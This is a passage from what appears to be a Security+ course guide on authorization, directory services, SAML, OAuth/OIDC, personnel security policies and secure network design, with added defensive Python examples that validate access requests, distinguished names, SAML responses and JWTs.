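from dataclasses import dataclass
from datetime import time
from ipaddress import ip_address, ip_network

ALLOW, DENY, STEP_UP = "allow", "deny", "require-reauthentication"

CORPORATE_NET = ip_network("10.0.0.0/8")        # assumption
BUSINESS_HOURS = (time(8, 0), time(18, 0))      # assumption


@dataclass(frozen=True)
class Request:
    subject: dict    # e.g. {"roles": {"employee", "finance"}}
    resource: dict   # e.g. {"name": "payroll.xlsx", "classification": "confidential"}
    context: dict    # e.g. {"ip": "10.1.2.3", "patched": True, "av_current": True, "time": time(10, 0)}


def make_request(roles, resource_name, classification, ip, patched, av_current, hour):
    """Convenience constructor from plain values (hour is a whole hour, 0-23)."""
    return Request(
        subject={"roles": set(roles)},
        resource={"name": resource_name, "classification": classification},
        context={"ip": ip, "patched": patched, "av_current": av_current, "time": time(hour, 0)},
    )


# Attribute predicates: each looks at one slice of the request.
def has_role(req, role):
    return role in req.subject["roles"]


def confidential(req):
    return req.resource["classification"] == "confidential"


def device_healthy(req):
    return req.context["patched"] and req.context["av_current"]


def on_corporate_network(req):
    return ip_address(req.context["ip"]) in CORPORATE_NET


def in_business_hours(req):
    return BUSINESS_HOURS[0] <= req.context["time"] <= BUSINESS_HOURS[1]


# Ordered rule table: (name, predicate, decision). Denials and step-up rules
# come first so that a later, broader allow cannot override them.
RULES = [
    ("unhealthy device may not touch confidential data",
     lambda r: confidential(r) and not device_healthy(r), DENY),
    ("confidential data from outside the corporate network needs re-authentication",
     lambda r: confidential(r) and not on_corporate_network(r), STEP_UP),
    ("finance role may use payroll files during business hours",
     lambda r: r.resource["name"].startswith("payroll") and has_role(r, "finance") and in_business_hours(r), ALLOW),
    ("any employee may read public documents",
     lambda r: r.resource["classification"] == "public" and has_role(r, "employee"), ALLOW),
]


def decide(req):
    """Return (decision, rule name). Unmatched requests are denied by default."""
    for name, predicate, decision in RULES:
        if predicate(req):
            return decision, name
    return DENY, "default deny"


if __name__ == "__main__":
    print(decide(make_request({"employee", "finance"}, "payroll.xlsx", "confidential", "203.0.113.5", True, True, 10)))
```

Because decide() is cheap and stateless it can be called on every request in a session rather than only at logon, which is what turns a static authorization check into conditional access; the step-up outcome is where a real system would demand re-authentication.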

Privileged Access Management

A privileged account is one that can make significant configuration changes to a host,
such as installing software or disabling a firewall or other security system. Privileged
accounts also have rights to log on network appliances and application servers.

Privileged access management (PAM) refers to policies, procedures, and technical
controls to prevent the malicious abuse of privileged accounts and to mitigate risks
from weak configuration control over privileges. These controls identify and document
privileged accounts, giving visibility into their use, and manage the credentials used to
access them (beyondtrust.com/resources/glossary/privileged-access-management-pam).

Directory Services

Show Slide(s): Directory Services

Directory services are the principal means of providing privilege management and
authorization on an enterprise network, storing information about users, computers,
security groups/roles, and services. A directory is like a database, where an object is
like a record, and things that you know about the object (attributes) are like fields. In
order for products from different vendors to be interoperable, most directories are
based on the same standard. The Lightweight Directory Access Protocol (LDAP) is a
protocol widely used to query and update X.500 format directories.

A distinguished name (DN) is a unique identifier for any given resource within an X.500-like
directory. A distinguished name is made up of attribute=value pairs, separated by commas.
The most specific attribute is listed first, and successive attributes become progressively
broader. This most specific attribute is also referred to as the relative distinguished name,
as it uniquely identifies the object within the context of successive parent attribute values.

Teaching Tip: Directory services are critical to the functioning of most enterprise
networks. They are also used over the Internet (IM user directories, for instance). The
main concerns are with the confidentiality of the information (read access), integrity
of the information (write access), and DoS (preventing network access by knocking out
the directory server). Note that the common name (CN) attribute of an X.509 digital
certificate is commonly configured as the FQDN. In an X.500 directory, CN is a single
host or username label. The distinguished name is specified through the hierarchy of
attributes.

Browsing objects in an Active Directory LDAP schema. (Screenshot used with permission from Microsoft.)

The types of attributes, what information they contain, and the way object types are
defined through attributes (some of which may be required, and some optional) is
described by the directory schema. Some of the attributes commonly used include
common name (CN), organizational unit (OU), organization (O), country (C), and domain
component (DC). For example, the distinguished name of a web server operated by
Widget in the UK might be:

CN=WIDGETWEB, OU=Marketing, O=Widget, C=UK, DC=widget, DC=foo
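An added Python example (not from the original guide) that splits a distinguished name into its relative distinguished names. It follows the RFC 4514 string form far enough to handle backslash-escaped commas in values; multi-valued RDNs joined with + and hex escapes are not handled.

```python
# Added example (not from the CompTIA guide): splitting an LDAP distinguished
# name into its relative distinguished names. It follows the RFC 4514 string
# form far enough to cope with backslash-escaped commas; multi-valued RDNs
# ('+') and hex escapes are not handled.
SPECIAL = ',+"\\<>;'   # characters that must be escaped inside a value


def split_unescaped(dn, sep=","):
    """Split on unescaped separators, dropping the escape backslashes."""
    parts, current, i = [], [], 0
    while i < len(dn):
        ch = dn[i]
        if ch == "\\" and i + 1 < len(dn):
            current.append(dn[i + 1])      # keep the escaped character literally
            i += 2
            continue
        if ch == sep:
            parts.append("".join(current))
            current = []
        else:
            current.append(ch)
        i += 1
    parts.append("".join(current))
    return parts


def parse_dn(dn):
    """'CN=a, OU=b, DC=c' -> [('CN','a'), ('OU','b'), ('DC','c')], most specific first."""
    rdns = []
    for part in split_unescaped(dn):
        if "=" not in part:
            raise ValueError(f"RDN without '=': {part!r}")
        attr, value = part.split("=", 1)
        rdns.append((attr.strip().upper(), value.strip()))
    return rdns


def escape_value(value):
    return "".join("\\" + ch if ch in SPECIAL else ch for ch in value)


def to_dn(rdns):
    """Inverse of parse_dn; re-escapes special characters in values."""
    return ",".join(f"{attr}={escape_value(value)}" for attr, value in rdns)


def relative_dn(dn):
    """The first (most specific) attribute=value pair."""
    return parse_dn(dn)[0]


def parent_dn(dn):
    """Everything after the RDN, i.e. the container the object lives in."""
    return to_dn(parse_dn(dn)[1:])


def domain_from_dn(dn):
    """Join the DC components into a DNS-style domain name."""
    return ".".join(value for attr, value in parse_dn(dn) if attr == "DC")


if __name__ == "__main__":
    example = "CN=WIDGETWEB, OU=Marketing, O=Widget, C=UK, DC=widget, DC=foo"
    print(relative_dn(example), parent_dn(example), domain_from_dn(example))
```

The escaping matters in practice: a user whose CN is "Smith, John" has a comma inside the RDN value, and a naive split on commas produces a bogus extra component.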

Federation and Attestation

Show Slide(s): Federation and Attestation

An on-premises network can use technologies such as LDAP and Kerberos, very often
implemented as a Windows Active Directory network, because the administration
of accounts and devices can be centralized. Expanding this type of network to share
resources with business partners or use services in public clouds means implementing
some type of federation technology.

Teaching Tip: Make sure that students understand the concepts of federation and trusts
and that SAML is a means of exchanging authorizations in a federated network.

Federation

Federation is the notion that a network needs to be accessible to more than just a
well-defined group of employees. In business, a company might need to make parts of
its network open to partners, suppliers, and customers. The company can manage its
employee accounts easily enough. Managing accounts for each supplier or customer
internally may be more difficult. Federation means that the company trusts accounts
created and managed by a different network. As another example, in the consumer
world, a user might want to use both Google Apps and Twitter. If Google and Twitter
establish a federated network for the purpose of authentication and authorization,
then the user can log on to Twitter using his or her Google credentials or vice versa.

Identity Providers and Attestation

In these models, the networks perform federated identity management. A user from
one network is able to provide attestation that proves their identity. In very general
terms, the process is similar to that of Kerberos authorization, and works as follows:

1. The user (principal) attempts to access a service provider (SP), or the relying party
(RP). The service provider redirects the principal to the identity provider (IdP) to
authenticate.

2. The principal authenticates with the identity provider and obtains an attestation
of identity, in the form of some sort of token or document signed by the IdP.

3. The principal presents the attestation to the service provider. The SP can validate
that the IdP has signed the attestation because of its trust relationship with
the IdP.

4. The service provider can now connect the authenticated principal to its own
accounts database. It may be able to query attributes of the user account profile
held by the IdP, if the principal has authorized this type of access.


Federated identity management overview. (Images © 123RF.com.)

Cloud versus On-Premises Requirements

Where a company needs to make use of cloud services or share resources with
business partner networks, authentication and authorization design comes with
more constraints and additional requirements. Web applications might not support
Kerberos, while third-party networks might not support direct federation with Active
Directory/LDAP. The design for these cloud networks is likely to require the use of
standards for performing federation and attestation between web applications.

Security Assertions Markup Language

Show Slide(s): Security Assertions Markup Language

A federated network or cloud needs specific protocols and technologies to implement
user identity assertions and transmit attestations between the principal, the relying
party, and the identity provider. Security Assertions Markup Language (SAML) is
one such solution. SAML attestations (or authorizations) are written in eXtensible
Markup Language (XML). Communications are established using HTTP/HTTPS and the
Simple Object Access Protocol (SOAP). These secure tokens are signed using the XML
signature specification. The use of a digital signature allows the relying party to trust
the identity provider.

Teaching Tip: While SAML is complex, make sure students understand that it allows
services to be separated from identity providers and not have to authenticate users
directly. The service provider does not authenticate the user; it obtains an assertion
from the identity provider that it has authenticated the user. Students should also
recognize the general format of SAML attestations/assertions.

As an example of a SAML implementation, Amazon Web Services (AWS) can function
as a SAML service provider. This allows companies using AWS to develop cloud
applications to manage their customers' user identities and provide them with
permissions on AWS without having to create accounts for them on AWS directly.

<samlp:Response
  xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
  xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
  ID="200" Version="2.0"
  IssueInstant="2020-01-01T20:00:10Z"
  Destination="https://sp.foo/saml/acs"
  InResponseTo="100">
  <saml:Issuer>https://idp.foo/sso</saml:Issuer>
  <ds:Signature>...</ds:Signature>
  <samlp:Status>...(success)...</samlp:Status>
  <saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="2000"
    Version="2.0"
    IssueInstant="2020-01-01T20:00:09Z">
    <saml:Issuer>https://idp.foo/sso</saml:Issuer>
    <ds:Signature>...</ds:Signature>
    <saml:Subject>...
    <saml:Conditions>...
      <saml:AudienceRestriction>...
    <saml:AuthnStatement>...
    <saml:AttributeStatement>
      <saml:Attribute>...
      <saml:Attribute>...
    </saml:AttributeStatement>
  </saml:Assertion>
</samlp:Response>
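The following added Python example (not from the original guide) covers steps 3 and 4 of the federation process described earlier from the service provider's side: the checks a relying party makes on a SAML response before trusting it. The response is constructed to match the skeleton shown; the issuer, destination and audience values are assumptions. Verifying the XML signature itself needs an XML-DSig implementation (for example the signxml or python3-saml packages) and is represented here only by the signature_verified flag; none of the other checks mean anything unless that flag is true.

```python
# Added example (not from the CompTIA guide): the checks a relying party makes
# on a SAML response after the XML signature has been verified. The response
# is constructed; issuer, destination and audience are assumptions. Signature
# verification needs an XML-DSig library and is represented by a flag here.
import xml.etree.ElementTree as ET
from datetime import datetime, timezone

NS = {
    "samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
    "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
}
SUCCESS = "urn:oasis:names:tc:SAML:2.0:status:Success"

SAMPLE_RESPONSE = """<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
    xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
    ID="200" Version="2.0" IssueInstant="2020-01-01T20:00:10Z"
    Destination="https://sp.foo/saml/acs" InResponseTo="100">
  <saml:Issuer>https://idp.foo/sso</saml:Issuer>
  <samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status>
  <saml:Assertion ID="2000" Version="2.0" IssueInstant="2020-01-01T20:00:09Z">
    <saml:Issuer>https://idp.foo/sso</saml:Issuer>
    <saml:Subject><saml:NameID>alice@idp.foo</saml:NameID></saml:Subject>
    <saml:Conditions NotBefore="2020-01-01T20:00:00Z" NotOnOrAfter="2020-01-01T20:05:00Z">
      <saml:AudienceRestriction><saml:Audience>https://sp.foo</saml:Audience></saml:AudienceRestriction>
    </saml:Conditions>
    <saml:AuthnStatement AuthnInstant="2020-01-01T20:00:09Z"/>
    <saml:AttributeStatement>
      <saml:Attribute Name="groups"><saml:AttributeValue>staff</saml:AttributeValue></saml:Attribute>
    </saml:AttributeStatement>
  </saml:Assertion>
</samlp:Response>"""


def parse_time(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def validate_response(xml_text, *, expected_issuer, expected_destination, expected_audience,
                      outstanding_request_id, now_utc, signature_verified):
    """Return (accepted, problems, subject, attributes); now_utc is an ISO 8601 'Z' timestamp."""
    now = parse_time(now_utc)
    problems = []
    if not signature_verified:
        problems.append("signature not verified")   # nothing below can be trusted without this
    root = ET.fromstring(xml_text)
    if root.tag != f"{{{NS['samlp']}}}Response":
        return False, ["not a samlp:Response"], None, {}
    if root.get("Destination") != expected_destination:
        problems.append("Destination is not this SP's ACS URL")
    if root.get("InResponseTo") != outstanding_request_id:
        problems.append("InResponseTo does not match an outstanding request")
    status = root.find("samlp:Status/samlp:StatusCode", NS)
    if status is None or status.get("Value") != SUCCESS:
        problems.append("status is not Success")
    assertion = root.find("saml:Assertion", NS)
    if assertion is None:
        problems.append("no assertion present")
        return False, problems, None, {}
    for issuer in (root.find("saml:Issuer", NS), assertion.find("saml:Issuer", NS)):
        if issuer is None or issuer.text != expected_issuer:
            problems.append("issuer is not the trusted IdP")
            break
    conditions = assertion.find("saml:Conditions", NS)
    if conditions is None:
        problems.append("assertion has no Conditions")
    else:
        not_before, not_on_or_after = conditions.get("NotBefore"), conditions.get("NotOnOrAfter")
        if not_before and now < parse_time(not_before):
            problems.append("assertion not yet valid")
        if not_on_or_after and now >= parse_time(not_on_or_after):
            problems.append("assertion expired")
        audiences = [a.text for a in conditions.findall("saml:AudienceRestriction/saml:Audience", NS)]
        if expected_audience not in audiences:
            problems.append("audience restriction does not name this SP")
    name_id = assertion.find("saml:Subject/saml:NameID", NS)
    subject = name_id.text if name_id is not None else None
    if subject is None:
        problems.append("no subject NameID")
    # Step 4: attributes the SP may map onto its own account database.
    attributes = {
        attr.get("Name"): [v.text for v in attr.findall("saml:AttributeValue", NS)]
        for attr in assertion.findall("saml:AttributeStatement/saml:Attribute", NS)
    }
    return not problems, problems, subject, attributes
```

The InResponseTo check is what ties the response to a request this SP actually issued; without it a signed but stale or replayed response would pass the other checks.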

OAuth and OpenID Connect

Show Slide(s): OAuth and OpenID Connect

Many public clouds use application programming interfaces (APIs) based on
Representational State Transfer (REST) rather than SOAP. These are often called
RESTful APIs. Where SOAP is a tightly specified protocol, REST is a looser architectural
framework. This allows the service provider more choice over implementation
elements. Compared to SOAP and SAML, there is better support for mobile apps.

Teaching Tip: Stress that an OAuth client is not the user. It is a website or mobile app
interacting with an OAuth IdP or resource server. There are two versions of OAuth.
Also, OpenID is a separate, older protocol to OIDC. Detailed knowledge of older
versions should not be required for the exam, but you might want to make students
aware of them (developer.okta.com/blog/2019/10/21/illustrated-guide-to-oauth-and-oidc).

OAuth

Authentication and authorization for a RESTful API is often implemented using the
Open Authorization (OAuth) protocol. OAuth is designed to facilitate sharing
of information (resources) within a user profile between sites. The user creates a
password-protected account at an identity provider (IdP). The user can use that
account to log on to an OAuth consumer site without giving the password to the
consumer site. A user (resource owner) can grant a client an authorization to access
some part of their account. A client in this context is an app or consumer site.

The user account is hosted by one or more resource servers. A resource server is
also called an API server because it hosts the functions that allow clients (consumer
sites and mobile apps) to access user attributes. Authorization requests are processed
by an authorization server. A single authorization server can manage multiple
resource servers; equally the resource and authorization server could be the same
server instance.


The client app or service must be registered with the authorization server. As part of
this process, the client registers a redirect URL, which is the endpoint that will process
authorization tokens. Registration also provides the client with an ID and a secret.
The ID can be publicly exposed, but the secret must be kept confidential between the
client and the authorization server. When the client application requests authorization,
the user approves the authorization server to grant the request using an appropriate
method. OAuth supports several grant types (or flows) for use in different contexts,
such as server to server or mobile app to server. Depending on the flow type, the
client will end up with an access token validated by the authorization server. The client
presents the access token to the resource server, which then accepts the request for
the resource if the token is valid.

OAuth implementations commonly use the JavaScript Object Notation (JSON) Web Token
(JWT) format for claims data. JWTs can easily be passed as Base64-encoded strings in
URLs and HTTP headers and can be digitally signed for authentication and integrity.
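An added Python example (not from the original guide) that issues a JWT access token and checks it the way a resource server should. HS256 with a shared secret is used so that it runs without key generation; authorization servers usually sign with an asymmetric algorithm such as RS256, but the order of checks is the same. The issuer, audience, scope and secret are assumptions.

```python
# Added example (not from the CompTIA guide): issuing and checking a JWT
# bearer token as an OAuth resource server would. HS256 (a shared secret)
# is used so the example runs without key generation; real authorization
# servers usually sign with an asymmetric algorithm such as RS256, but the
# verification order is the same. Issuer, audience, scope and secret are
# assumptions.
import base64
import hashlib
import hmac
import json
import time


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_token(claims, key):
    """Build header.payload.signature for the given claims (HS256)."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (b64url_encode(json.dumps(header, separators=(",", ":")).encode())
                     + "." + b64url_encode(json.dumps(claims, separators=(",", ":")).encode()))
    signature = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(signature)


def verify_token(token, key, *, expected_iss, expected_aud, required_scope, now=None):
    """Return (claims, 'ok') or (None, reason). Claims are not trusted until the signature checks out."""
    now = time.time() if now is None else now
    parts = token.split(".")
    if len(parts) != 3:
        return None, "malformed token"
    h64, p64, s64 = parts
    try:
        header = json.loads(b64url_decode(h64))
    except ValueError:
        return None, "malformed header"
    if header.get("alg") != "HS256":          # pin the algorithm; never honour 'none' or the header's choice
        return None, "unexpected alg"
    expected = hmac.new(key, f"{h64}.{p64}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s64)):
        return None, "bad signature"
    claims = json.loads(b64url_decode(p64))
    if claims.get("iss") != expected_iss:
        return None, "wrong issuer"
    aud = claims.get("aud")
    if expected_aud not in (aud if isinstance(aud, list) else [aud]):
        return None, "wrong audience"
    if "exp" not in claims or claims["exp"] <= now:
        return None, "expired"
    if claims.get("nbf", 0) > now:
        return None, "not yet valid"
    if required_scope not in claims.get("scope", "").split():
        return None, "insufficient scope"
    return claims, "ok"


if __name__ == "__main__":
    key = b"constructed-shared-secret"   # assumption
    token = issue_token({"iss": "https://auth.foo", "sub": "alice", "aud": "https://api.foo",
                         "scope": "profile:read", "iat": 1600000000, "exp": 1600003600}, key)
    print(verify_token(token, key, expected_iss="https://auth.foo", expected_aud="https://api.foo",
                       required_scope="profile:read", now=1600000100))
```

The algorithm is pinned rather than read from the token, and the signature is checked before any claim is used; accepting alg "none" or the header's choice of algorithm is the classic JWT verification mistake.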

OpenID Connect (OIDC)

OAuth is explicitly designed to authorize claims and not to authenticate users. The
implementation details for fields and attributes within tokens are not defined. There
is no mechanism to validate that a user who initiated an authorization request is
still logged on and present. The access token once granted has no authenticating
information. OpenID Connect (OIDC) is an authentication protocol that can be
implemented as special types of OAuth flows with precisely defined token fields.

Note that OpenID can also refer to an earlier protocol developed between 2005 and 2007.
This implemented a similar framework and underpinned early "sign on with" functionality,
but is now regarded as obsolete. OpenID uses XML-format messaging and supports only
web applications and not mobile apps.


Review Activity:
Authorization Solutions
Answer the following questions:

1. What are the advantages of a decentralized, discretionary access control
policy over a mandatory access control policy?

It is easier for users to adjust the policy to fit changing business needs. Centralized
policies can easily become inflexible and bureaucratic.

2. What is the difference between security group- and role-based permissions
management?

A group is simply a container for several user objects. Any organizing principle can be
applied. In a role-based access control system, groups are tightly defined according to
job functions. Also, a user should logically only possess the permissions of one role at
a time.

3. In a rule-based access control model, can a subject negotiate with the data
owner for access privileges? Why or why not?

This sort of negotiation would not be permitted under rule-based access control; it is a
feature of discretionary access control.

4. What is the purpose of directory services?

To store information about network resources and users in a format that can be
accessed and updated using standard queries.

5. True or false? The following string is an example of a distinguished name:


CN=ad, DC=classroom,DC=com

True.

6. You are working on a cloud application that allows users to log on with
social media accounts over the web and from a mobile application. Which
protocols would you consider and which would you choose as most
suitable?

Security Assertions Markup Language (SAML) and OAuth/OpenID Connect (OIDC).
OAuth with OIDC as an authentication layer offers better support for native mobile
apps so is probably the best choice.


Topic 8D
Explain the Importance of Personnel Policies

EXAM OBJECTIVES COVERED

5.3 Explain the importance of policies to organizational security

Teaching Tip: While students should understand the uses and reasons for applying these
policies, these content examples are quite straightforward. Try not to spend too long on
this topic, or designate it for self-study.

As well as implementing technical controls for identity and account management, you
will need to make sure that your personnel follow appropriate security procedures and
policies. The human element can represent a significant attack surface, especially when
social engineering attacks are involved. As a security professional, you will work with
a human resources department to assist with the formulation of policies and the
development and delivery of security awareness and training programs.

Conduct Policies

Show Slide(s): Conduct Policies

Operational policies include privilege/credential management, data handling, and
incident response. Other important security policies include those governing employee
conduct and respect for privacy.

Acceptable Use Policy

Enforcing an acceptable use policy (AUP) is important to protect the organization
from the security and legal implications of employees misusing its equipment.
Typically, the policy will forbid the use of equipment to defraud, defame, or to obtain
illegal material. It will prohibit the installation of unauthorized hardware or software
and explicitly forbid actual or attempted snooping of confidential data that the
employee is not authorized to access. Acceptable use guidelines must be reasonable
and not interfere with employees' fundamental job duties or privacy rights. An
organization's AUP may forbid use of Internet tools outside of work-related duties or
restrict such use to break times.

Code of Conduct and Social Media Analysis

A code of conduct, or rules of behavior, sets out expected professional standards.
For example, employees' use of social media and file sharing poses substantial risks
to the organization, including threat of virus infection or systems intrusion, lost work
time, copyright infringement, and defamation. Users should be aware that any data
communications, such as email, made through an organization's computer system
are likely stored within the system, on servers, backup devices, and so on. Such
communications are also likely to be logged and monitored. Employers may also
subject employees' personal social media accounts to analysis and monitoring, to
check for policy infringements.

Rules of behavior are also important when considering employees with privileged
access to computer systems. Technicians and managers should be bound by clauses
that forbid them from misusing privileges to snoop on other employees or to disable a
security mechanism.


Use of Personally Owned Devices in the Workplace


Portable devices, such as smartphones, USB sticks, media players, and so on, pose
a considerable threat to data security, as they make file copy so easy. Camera and
voice recording functions are other obvious security issues. Network access control,
endpoint management, and data loss prevention solutions can be of some use in
preventing the attachment of such devices to corporate networks. Some companies
may try to prevent staff from bringing such devices on site. This is quite difficult to
enforce, though.
Also important to consider is the unauthorized use of personal software by employees
or employees using software or services that have not been sanctioned for a project
(shadow IT). Personal software may include either locally installed software or
hosted applications, such as personal email or instant messenger, and may leave the
organization open to a variety of security vulnerabilities. Such programs may provide
a route for data exfiltration, a transport mechanism for malware, or possibly software
license violations for which the company might be held liable, just to name a few of the
potential problems.

Clean Desk Policy
A clean desk policy means that each employee's work area should be free from any
documents left there. The aim of the policy is to prevent sensitive information from
being obtained by unauthorized staff or guests at the workplace.

User and Role-Based Training
Show Slide(s): User and Role-Based Training

Another essential component of a secure system is effective user training. Untrained
users represent a serious vulnerability because they are susceptible to social
engineering and malware attacks and may be careless when handling sensitive or
confidential data.

Train users in secure behavior. (Image by dotshock © 123RF.com.)


Appropriate security awareness training needs to be delivered to employees at all
levels, including end users, technical staff, and executives. Some of the general topics
that need to be covered include the following:

• Overview of the organization's security policies and the penalties for non-compliance.

• Incident identification and reporting procedures.

• Site security procedures, restrictions, and advice, including safety drills, escorting
guests, use of secure areas, and use of personal devices.

• Data handling, including document confidentiality, PII, backup, encryption, and so on.

• Password and account management plus security features of PCs and mobile devices.

• Awareness of social engineering and malware threats, including phishing, website
exploits, and spam plus alerting methods for new threats.

• Secure use of software such as browsers and email clients plus appropriate use of
Internet access, including social networking sites.

There should also be a system for identifying staff performing security-sensitive
roles and grading the level of training and education required (between beginner,
intermediate, and advanced, for instance). Note that in defining such training
programs you need to focus on job roles, rather than job titles, as employees may
perform different roles and have different security training, education, or awareness
requirements in each role.

The NIST National Initiative for Cybersecurity Education framework (nist.gov/itl/applied-
cybersecurity/nice) sets out knowledge, skills, and abilities (KSAs) for different cybersecurity
roles. Security awareness programs are described in SP 800-50 (nvlpubs.nist.gov/nistpubs/
Legacy/SP/nistspecialpublication800-50.pdf).

Diversity of Training Techniques
Show Slide(s): Diversity of Training Techniques

It is necessary to frame security training in language that end users will respond to.
Education should focus on responsibilities and threats that are relevant to users. It is
necessary to educate users about new or emerging threats (such as fileless malware,
phishing scams, or zero-day exploits in software), but this needs to be stated in
language that users understand.
Using a diversity of training techniques helps to improve engagement and retention.
Training methods include facilitated workshops and events, one-on-one instruction and
mentoring, plus resources such as computer-based or online training, videos, books,
and blogs/newsletters.

Phishing Campaigns
A phishing campaign training event means sending simulated phishing messages to
users. Users that respond to the messages can be targeted for follow-up training.

Capture the Flag

Capture the Flag (CTF) is usually used in ethical hacker training programs and
gamified competitions. Participants must complete a series of challenges within a
virtualized computing environment to discover a flag. The flag will represent either
threat actor activity (for blue team exercises) or a vulnerability (for red team exercises)
and the participant must use analysis and appropriate tools to discover it. Capturing
the flag allows the user to progress to the next level and start a new challenge. Once
the participant has passed the introductory levels, they will join a team and participate
in a competitive event, where there are multiple flags embedded in the environment
and capturing them wins points for the participant and for their team.

Computer-Based Training and Gamification

Participants respond well to the competitive challenge of CTF events. This type of
gamification can be used to boost security awareness for other roles too. Computer-
based training (CBT) allows a student to acquire skills and experience by completing
various types of practical activities:

• Simulations: recreating system interfaces or using emulators so students can
practice configuration tasks.

• Branching scenarios: students choose between options to find the best choices to
solve a cybersecurity incident or configuration problem.

CBT might use video game elements to improve engagement. For example, students
might win badges and level-up bonuses such as skills or digitized loot to improve
their in-game avatar. Simulations might be presented so that the student chooses
encounters from a map and engages with a simulation environment in a first-person-
shooter type of 3D world.


Review Activity:
Importance of Personnel Policies
Answer the following questions:

1. Your company has been the victim of several successful phishing attempts
over the past year. Attackers managed to steal credentials from these
attacks and used them to compromise key systems. What vulnerability
contributed to the success of these social engineers, and why?

A lack of proper user training directly contributes to the success of social engineering
attempts. Attackers can easily trick users when those users are unfamiliar with the
characteristics and ramifications of such deception.

2. Why should an organization design role-based training programs?

Employees have different levels of technical knowledge and different work priorities.
This means that a one-size-fits-all approach to security training is impractical.

3. You are planning a security awareness program for a manufacturer. Is a
pamphlet likely to be sufficient in terms of resources?

Using a diversity of training techniques will boost engagement and retention. Practical
tasks, such as phishing simulations, will give attendees more direct experience.
Workshops or computer-based training will make it easier to assess whether the
training has been completed.


Lesson 8
Summary
You should be able to apply organizational and technical policies and training/
awareness programs that reduce the risk of insider threat and account compromise.
You should also be able to implement discretionary or rule-based access control
as appropriate and use protocols to communicate authorizations across federated
identity networks.

Guidelines for Implementing Identity and Account Management Controls

Follow these guidelines when you implement identity and account management
controls for local networks and cloud access:

• Establish requirements for access control (between discretionary, role-based,
mandatory, and attribute-based) and whether the scope must include federated
services (on-premises and cloud, for instance).

• Configure accounts, roles, and resources with the appropriate permissions settings,
using the principle of least privilege.

• Configure account policies to protect integrity:

  • Credential policies to ensure protection of standard and privileged accounts,
  including secure password selection.

  • Credential policies to manage shared, device, and third-party API secrets.

  • Account controls to apply conditional access based on location and time.

  • Organizational policies to apply separation of duties and ensure role-specific
  security awareness and training.

• Establish onboarding procedures to issue digital identities and account credentials
securely.

• Establish auditing procedures to review account usage and allocation of
permissions.

• Establish offboarding procedures to remove access privileges when employees or
contractors leave the company.

• Implement SAML or OAuth/OIDC to facilitate single sign-on between on-premises
networks and cloud services/applications.

Teaching Tip: Check that students are confident about the content that has been
covered. If there is time, re-visit any content examples that they have questions
about. If you have used all the available time for this lesson block, note the issues,
and schedule time for a review later in the course.

Interaction Opportunity: Optionally, ask students if they have experience of single
sign-on with cloud apps, and whether they are aware of the implementation that
it uses.

Lesson 9
Implementing Secure Network Designs

LESSON INTRODUCTION

Managing user authentication and authorization is only one part of building secure
information technology services. The network infrastructure must also be designed
to run services with the properties of confidentiality, integrity, and availability.
While design might not be a direct responsibility for you at this stage in your career,
you should understand the factors that underpin design decisions, and be able to
implement a design by deploying routers, switches, access points, and load balancers
in secure configurations.

Lesson Objectives

In this lesson, you will:

• Implement secure network designs.

• Implement secure routing and switching.

• Implement secure wireless infrastructure.

• Implement load balancers.

Teaching Tip: So far you have covered some of the main threat types, ways of
scanning for security violations and vulnerabilities, and the basis of access control
systems. The middle part of the course covers secure network architecture and
infrastructure. There is some overlap between Network+ and Security+ in topics
such as switching and VLANs, routing, firewalls, wireless security, and mobile device
security. Try to ensure that students are up-to-date on their Network+ knowledge.
Encourage them to review some of the material before class.


Topic 9A
Implement Secure Network Designs

EXAM OBJECTIVES COVERED
3.3 Given a scenario, implement secure network designs

While you may not be responsible for network design in your current role, it is
important that you understand the vulnerabilities that can arise from weaknesses in
network architecture, and some of the general principles for ensuring a well-designed
network. This will help you to contribute to projects to improve resiliency and to make
recommendations for improvements.

Teaching Tip: Objective 3.3 covers a wide range of disparate concepts and
technologies. Consequently, its content examples are split between several lessons
and topics, though we cover the bulk of them through lessons 9 and 10.
Secure Network Designs
Show Slide(s): Secure Network Designs

A secure network design provisions the assets and services underpinning business
workflows with the properties of confidentiality, integrity, and availability. Weaknesses
in the network architecture make it more susceptible to undetected intrusions or to
catastrophic service failures. Typical weaknesses include:

• Single points of failure: a "pinch point" relying on a single hardware server or
appliance or network channel.

• Complex dependencies: services that require many different systems to be
available. Ideally, the failure of individual systems or services should not affect the
overall performance of other network services.

• Availability over confidentiality and integrity: often it is tempting to take shortcuts
to get a service up and running. Compromising security might represent a quick fix
but creates long-term risks.

• Lack of documentation and change control: network segments, appliances, and
services might be added without proper change control procedures, leading to a
lack of visibility into how the network is constituted. It is vital that network managers
understand business workflows and the network services that underpin them.

• Overdependence on perimeter security: if the network architecture is "flat" (that
is, if any host can contact any other host), penetrating the network edge gives the
attacker freedom of movement.

Cisco's SAFE architecture (cisco.com/c/en/us/solutions/enterprise/design-zone-security/
landing_safe.html#~overview) is a good starting point for understanding the complex
topic of network architecture design. The SAFE guidance refers to places in the network
(PINs). These represent types of network locations, including campus networks, branch
offices, data centers, and the cloud. There are two special locations in these networks
(Internet Edge and WAN) that facilitate connections between locations and with
untrusted networks.
Each PIN can be protected with security controls and capabilities, classified into a
series of secure domains, such as threat defense, segmentation, security intelligence,
and management.

Teaching Tip: SAFE architecture is not listed in the exam objectives, but it is a good
starting point for network design.

Lesson 9: Implementing Secure Network Designs | Topic 9A


Business Workflows and Network Architecture
Show Slide(s): Business Workflows and Network Architecture

Network architecture is designed to support business workflows. You can illustrate the
sorts of decisions that need to be made by analyzing a simple workflow, such as email:

